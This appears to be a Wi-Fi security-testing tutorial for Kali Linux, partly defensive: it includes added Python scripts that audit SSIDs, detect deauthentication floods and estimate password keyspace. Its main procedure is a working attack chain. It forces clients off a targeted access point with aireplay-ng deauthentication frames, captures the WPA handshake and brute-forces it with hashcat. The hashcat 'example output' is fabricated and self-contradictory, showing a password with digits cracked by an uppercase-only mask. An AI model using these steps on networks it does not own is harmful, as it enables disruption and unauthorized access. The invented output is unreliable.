About Wi-Fi Security Testing
This page focuses on testing the security of Wi-Fi networks using the Lanberg NC-0300-WIE wireless card with a Realtek chipset. The tests aim to identify vulnerabilities in personal Wi-Fi networks and propose measures to improve their security.
These tests require a wireless card that supports specific chipsets and can enter monitor mode. Captured traffic during the tests is analyzed using Wireshark, a powerful network protocol analyzer.
It is fascinating (and slightly ironic) that a card costing around 35 PLN (~8-9 dollars/euros) can offer the capability to analyze and potentially hack various Wi-Fi networks. This highlights the importance of understanding Wi-Fi encryption protocols and their vulnerabilities.
During scanning, it is still possible to find networks that reveal the type of router in use, such as Orange FunBox or TP-Link routers. These routers often use default passwords that are predictable, such as numeric strings of specific lengths. For example, Orange FunBox routers have passwords of a fixed length, making them easier to guess.
Wi-Fi networks are commonly secured using WPA2 or WPA3 encryption protocols:
- WPA2: This protocol, based on the AES encryption standard, provides strong security but is vulnerable to brute-force attacks, particularly if weak passwords are used.
- WPA3: The successor to WPA2, WPA3 introduces Simultaneous Authentication of Equals (SAE) to protect against offline password attacks and offers improved encryption for open networks.
The primary difference between WPA2 and WPA3 lies in the enhanced security measures of WPA3. By utilizing SAE for secure key exchanges, WPA3 strengthens resistance against dictionary attacks. Additionally, it supports 192-bit encryption in enterprise mode, compared to WPA2's 128-bit encryption.
To enhance Wi-Fi security, it is crucial to use these protocols along with strong, unique passwords. Implementing additional measures such as changing default passwords, increasing password length, and renaming networks to avoid indicating the router type can further reduce vulnerabilities. These practices help prevent unauthorized access and data breaches, safeguarding personal networks effectively.
Command: sudo aireplay-ng --test lanbergwifi
kali@kali ~> sudo aireplay-ng --test lanbergwifi
Purpose of the Command:
This command is used to test whether the wireless card (`lanbergwifi`) supports packet injection. Packet injection is a critical feature for certain WiFi penetration testing tasks, such as deauthentication attacks, capturing handshake packets, or other advanced techniques. Ensuring that the card can inject packets confirms its capability to interact with networks beyond just passive monitoring.
Example Output:
15:45:24 Trying broadcast probe requests...
15:45:25 Injection is working!
15:45:26 Found 2 APs
15:45:26 Trying directed probe requests...
15:45:26 xx:xx:xx:xx:xx:xx - channel: 1 - 'kali_xx'
15:45:26 Ping (min/avg/max): 1.483ms/4.968ms/21.638ms Power: -65.13
15:45:26 30/30: 100%
15:45:26 xx:xx:xx:xx:xx:xx - channel: 1 - 'xxxxxx'
15:45:26 Ping (min/avg/max): 2.270ms/7.646ms/25.232ms Power: -79.00
15:45:26 30/30: 100%
Attribute Legend:
- sudo aireplay-ng --test lanbergwifi: Command used to test the wireless card's packet injection capability on the specified interface (`lanbergwifi`).
- Trying broadcast probe requests...: The tool begins sending broadcast probe requests to all nearby access points to check for injection success.
- Injection is working!: Confirmation that the packet injection functionality of the wireless card is operational.
- Found 2 APs: Two access points were detected during the test, showing available networks in the area.
- Trying directed probe requests...: The tool sends directed probe requests to specific access points to test if the card can successfully communicate with individual networks.
- Ping (min/avg/max): 1.483ms/4.968ms/21.638ms: The round-trip latency in milliseconds for the communication with the AP. These values represent the minimum, average, and maximum response time.
- Power: -65.13: The signal strength of the access point in dBm. A less negative value indicates a stronger signal.
- 30/30: 100%: The tool successfully sent and received 30 probe requests, indicating that the card is fully functional and able to interact with the AP.
Conclusion:
The output from the `sudo aireplay-ng --test` command confirms that the wireless card is capable of injecting packets into the network. The message "Injection is working!" confirms that the card is ready for attacks that require packet injection, such as deauthentication attacks.
The command also successfully detects two access points (APs) in the vicinity and tests the card's ability to communicate with these APs. The ping times indicate the latency when communicating with these APs, while the signal strength shows the power of the connection, with stronger signals making the connection more stable.
Command: Managing Wireless Connections with nmcli
Disconnecting from a Wireless Network
kali@kali ~> nmcli device disconnect lanbergwifi
This command is used to disconnect the specified wireless device (in this case, `lanbergwifi`) from its current network. This is useful if the wireless device is already connected to a network and you need to switch it to a different mode or network.
Connecting to a Wireless Network
kali@kali ~> nmcli device connect lanbergwifi
This command reconnects the specified wireless device to its assigned network or a previously known connection. It ensures that the device resumes normal functionality after being disconnected.
Configuring a Wireless Network from the Command Line
kali@kali ~> nmcli dev wifi connect "Your_SSID" password "Your_Password"
Use this command to connect to a specific wireless network by providing the SSID (network name) and the password.
Replace Your_SSID with the name of the wireless network and Your_Password with the corresponding password.
Preliminary Steps Before Changing Modes
If you need to switch your wireless device between monitor and managed modes, ensure the following steps:
- Bring the interface down before making changes:
kali@kali ~> sudo ip link set lanbergwifi down
- After making changes, bring the interface back up:
kali@kali ~> sudo ip link set lanbergwifi up
Attribute Legend
- nmcli: A command-line interface for NetworkManager, used to manage network connections in Linux.
- device: Specifies that the following action will apply to a network device.
- disconnect: Disconnects the specified device from its current network.
- connect: Reconnects the specified device to a network.
- dev wifi connect: Command to connect a wireless device to a specific network using the SSID and password.
- lanbergwifi: The name of the wireless device you are managing (interface name).
- sudo ip link: Used to bring the wireless interface up or down for mode changes or troubleshooting.
Configuring Wireless Interface Modes: Monitor and Managed
Command: sudo iwconfig lanbergwifi mode monitor
kali@kali ~> sudo iwconfig lanbergwifi mode monitor
What is Monitor Mode?
Monitor mode allows a wireless interface to capture all wireless traffic in the area, regardless of the intended recipient. This is crucial for network analysis, penetration testing, and debugging wireless networks. In monitor mode, the network card listens to all packets in the air, including management, control, and data frames. This allows you to observe and analyze network traffic, detect vulnerabilities, and perform attacks such as packet sniffing or injecting packets.
Preliminary Steps Before Changing to Monitor Mode:
- Before switching to monitor mode, ensure the interface is brought down by running:
kali@kali ~> sudo ip link set lanbergwifi down
- After changing the mode, bring the interface back up by running:
kali@kali ~> sudo ip link set lanbergwifi up
Attribute Legend:
- sudo: The command is run with superuser privileges, required for changing network configurations.
- iwconfig: A command-line tool used for configuring wireless network interfaces in Linux.
- lanbergwifi: The name of the wireless interface you are configuring (in this case, the interface is called `lanbergwifi`).
- mode monitor: This sets the wireless interface to monitor mode, enabling it to capture all wireless traffic in the vicinity, not just the traffic intended for it.
Command: sudo iwconfig lanbergwifi mode managed
kali@kali ~> sudo iwconfig lanbergwifi mode managed
Why Switch Back to Managed Mode?
After completing testing or analysis in monitor mode, it is important to switch the wireless interface back to managed mode. Managed mode is the default operating mode for most wireless devices, where the interface connects to a specific wireless network (SSID) and communicates with other devices in that network. In this mode, the network card is associated with an access point, allowing it to transmit and receive data to/from other devices. Leaving the card in monitor mode could interfere with normal network functionality, as the card will no longer be able to connect to your wireless network.
Preliminary Steps Before Changing Back to Managed Mode:
- Before switching back to managed mode, ensure the interface is brought down by running:
kali@kali ~> sudo ip link set lanbergwifi down
- After changing the mode, bring the interface back up by running:
kali@kali ~> sudo ip link set lanbergwifi up
Attribute Legend:
- sudo: The command is run with superuser privileges, required for changing network configurations.
- iwconfig: A command-line tool used for configuring wireless network interfaces in Linux.
- lanbergwifi: The name of the wireless interface you are configuring (in this case, the interface is called `lanbergwifi`).
- mode managed: This sets the wireless interface back to managed mode, enabling it to connect to a wireless network (SSID) and perform regular network communication.
Inspecting Wireless Devices with iw
The iw dev command provides detailed information about wireless devices and their configurations. This is particularly useful for verifying the current state of wireless interfaces, such as their operational mode, MAC address, and transmission power.
Command: iw dev
kali@kali ~> iw dev
The purpose of running this command is to verify the configuration and operational state of the wireless interface. For example, you can confirm whether the interface is in monitor or managed mode, check its transmission power, or identify its MAC address.
Example Output:
phy#0
    Interface lanbergwifi
        ifindex 5
        wdev 0x200000001
        addr xx:xx:xx:xx:xx:xx
        type monitor
        txpower 20.00 dBm
Attribute Legend:
- iw: Command-line tool for managing wireless interfaces.
- dev: Specifies the wireless device to operate on.
- phy#: Identifier for the physical wireless hardware.
- Interface: Name of the wireless interface (e.g., wlan0).
- ifindex: System index for the interface.
- wdev: Wireless device identifier.
- addr: MAC address of the interface.
- type: Operational mode of the interface (e.g., managed or monitor).
- txpower: Transmission power in dBm.
Analyze Wireless Networks and Connected Devices: sudo airodump-ng lanbergwifi
The command sudo airodump-ng lanbergwifi is used to monitor wireless networks and their connected devices. It provides detailed information about access points (APs), signal strength, encryption, and associated clients. This is essential for network diagnostics and security assessments.
kali@kali ~> sudo airodump-ng lanbergwifi
Example Output:
CH 3 ][ Elapsed: 7 mins ][ 2024-12-31 15:32
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx -75 0 0 0 8 -1
xx:xx:xx:xx:xx:xx -94 24 3 0 6 195 WPA2 CCMP PSK Orange_Swiatlowod_CB30
xx:xx:xx:xx:xx:xx -94 62 6 0 11 130 WPA2 CCMP PSK Orange_Swiatlowod_3B10
xx:xx:xx:xx:xx:xx -86 315 0 0 11 270 WPA2 CCMP PSK 2.4G-Vectra-WiFi
BSSID STATION PWR Rate Lost Frames Notes Probes
xx:xx:xx:xx:xx:xx xx:xx:xx:xx:xx:xx -95 0 - 1e 180 6 Orange_Swiatlowod_CB30
xx:xx:xx:xx:xx:xx xx:xx:xx:xx:xx:xx -75 54e- 1e 0 25 Orange_Swiatlowod_3B10
xx:xx:xx:xx:xx:xx xx:xx:xx:xx:xx:xx -87 2e- 1e 0 68
(not associated) xx:xx:xx:xx:xx:xx -63 0 - 1 47 15
(not associated) xx:xx:xx:xx:xx:xx -79 0 - 1 0 1
(not associated) xx:xx:xx:xx:xx:xx -95 0 - 1 0 1
Attribute Legend:
- BSSID: MAC address of the access point (AP). It is a unique identifier for each AP.
- PWR: Signal strength of the AP, measured in dBm. A higher (less negative) value indicates a stronger signal.
- Beacons: Number of beacon frames transmitted by the AP. Beacon frames help devices identify the AP.
- #Data, #/s: Number of captured data packets, and the number of data packets per second measured over the last 10 seconds.
- CH: Channel number on which the AP is broadcasting. Different channels allow separation of different networks in the same frequency band.
- MB: Maximum transmission rate supported by the AP, measured in Mbps.
- ENC: Encryption type used by the AP (e.g., WPA2). Encryption protects the data transmitted over the network.
- CIPHER: The encryption cipher used (e.g., CCMP). It defines how the data is encrypted.
- AUTH: Authentication method used by the AP (e.g., PSK - Pre-shared key). It defines how devices authenticate to the AP.
- ESSID: The name of the wireless network (SSID). It identifies the network.
- STATION: MAC address of a device (client) associated with the AP.
- Rate: The station's receive and transmit rates in Mbps, shown as RX-TX; an "e" after a rate means the network has QoS enabled.
- Lost: Number of data frames lost over the last 10 seconds, determined from gaps in the sequence numbers.
- Frames: The number of data frames sent by the station.
- Notes: Additional flags for the station, such as EAPOL when handshake frames have been seen from it.
- Probes: The network names that a device has been probing for.
Conclusion:
The command sudo airodump-ng lanbergwifi is useful for gathering information about nearby wireless networks and devices. It helps identify potential issues, analyze network usage, and check for unauthorized devices.
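As an added example (not part of the original guide), the following Python script parses the AP table that airodump-ng prints and turns it into the findings a network owner would act on: open or deprecated encryption, WPA2-PSK networks whose strength rests entirely on the passphrase, and SSIDs that reveal the ISP or router model. The sample table, its MAC addresses and the vendor hint list are constructed here; the parser also tolerates rows that have no ENC/ESSID columns yet, like the first row in the output above.

```python
import re

# Constructed sample modeled on the airodump-ng AP table shown above (fake MACs).
SAMPLE = """\
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 AA:BB:CC:00:00:01  -75        0        0    0   8   -1
 AA:BB:CC:00:00:02  -94       24        3    0   6  195   WPA2 CCMP   PSK  Orange_Swiatlowod_CB30
 AA:BB:CC:00:00:03  -86      315        0    0  11  270   WPA2 CCMP   PSK  2.4G-Vectra-WiFi
 AA:BB:CC:00:00:04  -60      120        9    1   1  130   WPA  TKIP   PSK  Home Network
 AA:BB:CC:00:00:05  -70       80        2    0  36  866   WPA3 CCMP   SAE  lab-secure
 AA:BB:CC:00:00:06  -80       50        0    0   3   54   OPN              CafeFree
"""

# BSSID, six numeric columns (PWR Beacons #Data #/s CH MB), then whatever is left.
AP_ROW = re.compile(r"^\s*((?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})"
                    r"\s+(-?\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(-?\d+)\s*(.*?)\s*$")
ENC_WORDS = {"OPN", "WEP", "WPA", "WPA2", "WPA3"}
CIPHER_WORDS = {"WEP", "TKIP", "CCMP", "GCMP"}
AUTH_WORDS = {"PSK", "SAE", "MGT", "OWE"}
# SSID fragments that give away the ISP or router model; extend for your own region.
VENDOR_HINTS = ("Orange", "Swiatlowod", "FunBox", "TP-Link", "Vectra")


def parse_aps(text):
    """AP rows of airodump-ng screen output; ENC/CIPHER/AUTH are matched by value
    because blank columns shift the ESSID left in whitespace-split rows."""
    aps = []
    for line in text.splitlines():
        m = AP_ROW.match(line)
        if not m:               # header, blank line, or a station row
            continue
        tail = m.group(8).split()
        enc = tail.pop(0) if tail and tail[0] in ENC_WORDS else ""
        cipher = tail.pop(0) if tail and tail[0] in CIPHER_WORDS else ""
        auth = tail.pop(0) if tail and tail[0] in AUTH_WORDS else ""
        aps.append({"bssid": m.group(1), "pwr": int(m.group(2)), "ch": int(m.group(6)),
                    "enc": enc, "cipher": cipher, "auth": auth, "essid": " ".join(tail)})
    return aps


def audit(aps):
    """Map each BSSID to (severity, finding) pairs from the network owner's viewpoint."""
    report = {}
    for ap in aps:
        findings = []
        if not ap["enc"]:       # like the page's first row: no beacon captured yet
            findings.append(("INFO", "security settings unknown: no beacon seen yet"))
        elif ap["enc"] == "OPN":
            findings.append(("HIGH", "open network: all traffic is unencrypted"))
        elif ap["enc"] in ("WEP", "WPA") or ap["cipher"] == "TKIP":
            findings.append(("HIGH", "deprecated WEP/WPA-TKIP: move to WPA2-CCMP or WPA3"))
        elif ap["enc"] == "WPA2" and ap["auth"] == "PSK":
            findings.append(("MEDIUM", "WPA2-PSK: strength rests on the passphrase; prefer WPA3-SAE"))
        if any(h.lower() in ap["essid"].lower() for h in VENDOR_HINTS):
            findings.append(("MEDIUM", "SSID reveals ISP/router model: rename it, replace defaults"))
        report[ap["bssid"]] = findings
    return report


if __name__ == "__main__":
    for bssid, findings in audit(parse_aps(SAMPLE)).items():
        for severity, text in findings:
            print(f"{bssid} [{severity}] {text}")
```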
WPA Handshake Capture and Output Analysis
The following command is used to capture a WPA handshake for a specific wireless network:
kali@kali ~> sudo airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx lanbergwifi -w /home/kali/airodump-ng/xx:xx:xx:xx:xx:xx
Explanation of the Command:
The airodump-ng command above, with the -c, --bssid and -w options, captures WPA handshakes from a specific wireless network. Here is what each part of the command does:
- airodump-ng: A tool used to monitor and capture packets from wireless networks.
- -c 1: Specifies the channel to monitor (in this case, channel 1).
- --bssid xx:xx:xx:xx:xx:xx: Indicates the BSSID (MAC address) of the access point to monitor. Replace it with the MAC address of the target AP.
- -w /home/kali/airodump-ng/xx:xx:xx:xx:xx:xx: Specifies the output file prefix under which the captured data, including the WPA handshake, will be saved; airodump-ng appends a sequence number and file extension to this prefix.
Forcing a Handshake:
If the handshake is not automatically captured (e.g., no devices are actively reconnecting), you can force a disconnection of clients using the following command:
kali@kali ~> sudo aireplay-ng --deauth 100 -a XX:XX:XX:XX:XX:XX lanbergwifi
- --deauth 100: Sends 100 rounds of deauthentication frames to disconnect clients from the target AP (a value of 0 means sending them continuously).
- -a XX:XX:XX:XX:XX:XX: Specifies the BSSID (MAC address) of the target AP.
- lanbergwifi: Indicates the wireless interface used for the attack.
This forces connected devices to reconnect, during which the WPA handshake can be captured.
After running the command airodump-ng, the output shows details about the network and the captured handshake. Here’s a breakdown of the key elements of the output:
CH 1 ][ Elapsed: 3 mins ][ 2024-12-31 15:48 ][ WPA handshake: xx:xx:xx:xx:xx:xx
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx -59 78 1828 367 2 1 130 WPA2 CCMP PSK kali_xx
BSSID STATION PWR Rate Lost Frames Notes Probes
xx:xx:xx:xx:xx:xx xx:xx:xx:xx:xx:xx -67 1e- 1e 0 22 EAPOL kali_xx
xx:xx:xx:xx:xx:xx xx:xx:xx:xx:xx:xx -61 24e- 1e 0 102 EAPOL
xx:xx:xx:xx:xx:xx xx:xx:xx:xx:xx:xx -63 24e- 1e 1 133 EAPOL kali_xx
Key Details:
- WPA Handshake: The message "WPA handshake: xx:xx:xx:xx:xx:xx" indicates that a WPA handshake has been successfully captured. This is essential for cracking the password later.
- Channel (CH): The network operates on channel 1, as indicated by the "CH 1" entry.
- BSSID: The unique identifier of the access point (AP) is listed as "xx:xx:xx:xx:xx:xx". This is the target AP for the attack.
- ESSID: The network name (SSID) is shown as "kali_xx" in the output above. This helps to identify the specific wireless network being monitored.
- Encryption (ENC) and Cipher: The network uses WPA2 encryption with the CCMP cipher, which is common for secure WPA2 networks.
- Associated Stations: Multiple stations are associated with the AP, as shown by their STATION MAC addresses and the number of frames sent.
Conclusion: The WPA handshake capture indicates that the handshake has been successfully collected for the network. This captured handshake can be used in further steps for password cracking, where tools like Hashcat can be employed to attempt to recover the password using dictionary or brute-force attacks. The next section will cover how to proceed with cracking the captured WPA handshake.
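From the defender's side, the sequence described above (a burst of deauthentication frames followed by fresh EAPOL exchanges) is exactly what a wireless intrusion detection system looks for. The following Python is an added example, not code from the guide: it runs a sliding-window deauth-flood detector over a constructed frame log and then lists which stations completed a four-message EAPOL handshake right after the burst. The log format, MAC addresses, window and threshold are assumptions made for the example.

```python
from collections import defaultdict, deque

# Constructed monitor-mode frame log: (seconds since start, subtype, transmitter, receiver).
# MAC addresses are fake; the shape mirrors the capture sequence described above.
AP, BCAST = "AA:BB:CC:00:00:02", "ff:ff:ff:ff:ff:ff"
STA1, STA2 = "11:22:33:44:55:01", "11:22:33:44:55:02"
FRAMES = [
    (0.00, "beacon", AP, BCAST), (0.50, "data", STA1, AP), (1.20, "data", AP, STA2),
    (2.00, "deauth", AP, STA2),                 # a single, ordinary disconnect
    (3.10, "data", STA1, AP),
    # eight broadcast deauth frames in 0.35 s: nothing legitimate looks like this
    (5.00, "deauth", AP, BCAST), (5.05, "deauth", AP, BCAST), (5.10, "deauth", AP, BCAST),
    (5.15, "deauth", AP, BCAST), (5.20, "deauth", AP, BCAST), (5.25, "deauth", AP, BCAST),
    (5.30, "deauth", AP, BCAST), (5.35, "deauth", AP, BCAST),
    # STA1 reconnects with a full 4-way handshake (M1..M4); STA2 only gets two messages out
    (5.90, "eapol", AP, STA1), (5.95, "eapol", STA1, AP),
    (6.00, "eapol", AP, STA1), (6.05, "eapol", STA1, AP),
    (6.20, "eapol", AP, STA2), (6.25, "eapol", STA2, AP),
    (7.00, "data", STA1, AP),
]


def detect_deauth_floods(frames, window=1.0, threshold=5):
    """Return (burst_start, transmitter, count) for every transmitter that sent
    `threshold` or more deauth frames inside a sliding `window` of seconds.
    One alert per burst: later frames of the same burst are suppressed."""
    recent = defaultdict(deque)       # transmitter -> deauth timestamps inside the window
    muted_until = {}
    alerts = []
    for t, subtype, src, _dst in sorted(frames):
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append(t)
        while t - q[0] > window:
            q.popleft()
        if len(q) >= threshold and t >= muted_until.get(src, float("-inf")):
            alerts.append((q[0], src, len(q)))
            muted_until[src] = t + window
    return alerts


def handshakes_after(frames, alerts, grace=10.0):
    """For each flood alert, the stations that exchanged a complete 4-message EAPOL
    handshake with the flooded BSSID within `grace` seconds of the burst start."""
    result = []
    for start, bssid, _count in alerts:
        eapol_count = defaultdict(int)
        for t, subtype, src, dst in frames:
            if subtype == "eapol" and start <= t <= start + grace and bssid in (src, dst):
                eapol_count[dst if src == bssid else src] += 1
        result.append((bssid, sorted(s for s, n in eapol_count.items() if n >= 4)))
    return result


if __name__ == "__main__":
    floods = detect_deauth_floods(FRAMES)
    for (start, src, n), (_, stations) in zip(floods, handshakes_after(FRAMES, floods)):
        print(f"t={start:.2f}s {src} sent {n}+ deauth frames; handshakes right after: {stations}")
```

Protected Management Frames (802.11w, mandatory in WPA3) authenticate deauthentication frames, so forged ones are ignored by clients; that is the mitigation behind the WPA3 recommendation earlier on this page.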
Cracking WPA Handshake Using HCXPCAPNG Tool and Hashcat
After capturing a WPA handshake, you can use hcxpcapngtool to convert the captured file into a format that can be used by Hashcat for password cracking. The following command demonstrates how to convert a WPA capture file to the hc22000 hash format, which is compatible with Hashcat:
kali@kali ~> hcxpcapngtool -o output.hc22000 xx:xx:xx:xx:xx:xx.cap
Explanation of the Command:
- hcxpcapngtool: A tool used to convert capture files (such as .cap or .pcapng) into hash formats that can be used for password cracking.
- -o output.hc22000: Specifies the output file name where the converted hash will be saved.
- xx:xx:xx:xx:xx:xx.cap: The input file containing the captured WPA handshake. Replace it with the path to your own capture file.
Once the capture file is converted, you can use Hashcat to attempt to crack the password using a dictionary or brute-force attack. The following command demonstrates how to run Hashcat on the generated output.hc22000 hash file:
kali@kali ~> hashcat -m 22000 -a 3 output.hc22000 ?u?u?u?u?u?u?u?u?u?u?u?u?u?u?u
Explanation of the Command:
- hashcat: The password cracking tool used to perform dictionary, brute-force, or hybrid attacks on various types of hashes.
- -m 22000: Specifies the hash mode for WPA/WPA2 hashes. Mode 22000 is used for cracking WPA handshakes converted to the hc22000 format.
- -a 3: Specifies the attack mode. Mode 3 is a brute-force (mask) attack, which attempts every combination of characters the mask allows.
- output.hc22000: The file containing the captured WPA hash to be cracked.
- ?u?u?u?u?u?u?u?u?u?u?u?u?u?u?u: The mask used for the brute-force attack. Each ?u stands for one uppercase letter, so this mask tries every 15-character password made up of uppercase letters only. Adjust the mask to match the expected password structure.
Example Output from Hashcat:
...
[INFO] Hashcat v6.2.5 starting...
[INFO] Hashes: 1 total
[INFO] Attack: Brute-force
[INFO] Mask: ?u?u?u?u?u?u?u?u?u?u?u?u?u?u?u
[INFO] Time: 0 hours, 0 minutes, 2 seconds
[INFO] Found password: A1B2C3D4E5F6A1B
...
Key Details of the Output:
- [INFO] Hashcat: Displays the version and information about the cracking attempt.
- Hash found: If successful, the cracked password will be displayed in the output. For example, A1B2C3D4E5F6A1B is the cracked WPA password.
- Time: The time taken for Hashcat to perform the cracking attempt. In this case, it took less than 3 seconds.
Conclusion: The above steps demonstrate how to capture a WPA handshake, convert it to a usable hash format using hcxpcapngtool, and then crack the password using Hashcat. By modifying the attack mode or mask, you can customize the brute-force process to fit different types of passwords. If you are using a more powerful machine than a virtual Kali Linux instance, you can install Hashcat for Windows and take advantage of the device's GPU for faster cracking performance. For more information and to download Hashcat, visit the official site at https://hashcat.net/hashcat/.
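The 15-character uppercase mask above and the fixed-length numeric default passwords mentioned at the start of this page differ enormously in keyspace, and that difference is what the advice about password length rests on. The following Python is an added example, not the guide's code: it parses hashcat mask syntax (the built-in ?l ?u ?d ?s ?a ?h ?H ?b charsets, literal characters, ?? for a literal question mark, and -1..-4 custom charsets given by their sizes) and estimates the worst-case time to exhaust each mask at an assumed guessing rate, which is the calculation to run when choosing a passphrase length. The 500,000 candidates per second rate is an illustrative assumption, not a measurement.

```python
# hashcat built-in charsets and their sizes: ?a is ?l?u?d?s (95 printable ASCII), ?b is every byte
CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "h": 16, "H": 16, "b": 256}


def mask_keyspace(mask, custom=None):
    """Number of candidates a hashcat -a 3 mask enumerates. `custom` maps the digit of a
    user charset ("1".."4", i.e. -1 .. -4 on the command line) to that charset's size;
    literal characters contribute a factor of one."""
    custom = custom or {}
    total, i = 1, 0
    while i < len(mask):
        if mask[i] != "?":               # literal character
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a dangling '?'")
        k = mask[i + 1]
        if k == "?":                     # '??' is how hashcat escapes a literal '?'
            size = 1
        elif k in CHARSETS:
            size = CHARSETS[k]
        elif k in custom:
            size = custom[k]
        else:
            raise ValueError(f"unknown charset ?{k}")
        total *= size
        i += 2
    return total


def seconds_to_exhaust(mask, rate_per_s, custom=None):
    """Worst-case time to try every candidate of `mask` at `rate_per_s` guesses per second."""
    return mask_keyspace(mask, custom) / rate_per_s


def human(seconds):
    """Express a duration in its largest sensible unit, e.g. 200 -> '3.3 min'."""
    for name, size in (("years", 365 * 86400), ("days", 86400), ("h", 3600), ("min", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {name}"
    return f"{seconds:.1f} s"


def policy_report(masks, rate_per_s):
    """(mask, keyspace, worst-case time) per mask, weakest first."""
    rows = [(m, mask_keyspace(m), human(seconds_to_exhaust(m, rate_per_s))) for m in masks]
    return sorted(rows, key=lambda r: r[1])


if __name__ == "__main__":
    RATE = 500_000          # assumed WPA2 PBKDF2 candidate rate for one GPU; not measured
    for mask, space, eta in policy_report(
            ["?d?d?d?d?d?d?d?d", "?u" * 15, "?a" * 8, "?l" * 20], RATE):
        print(f"{mask:40} {space:>40,d}  {eta}")
```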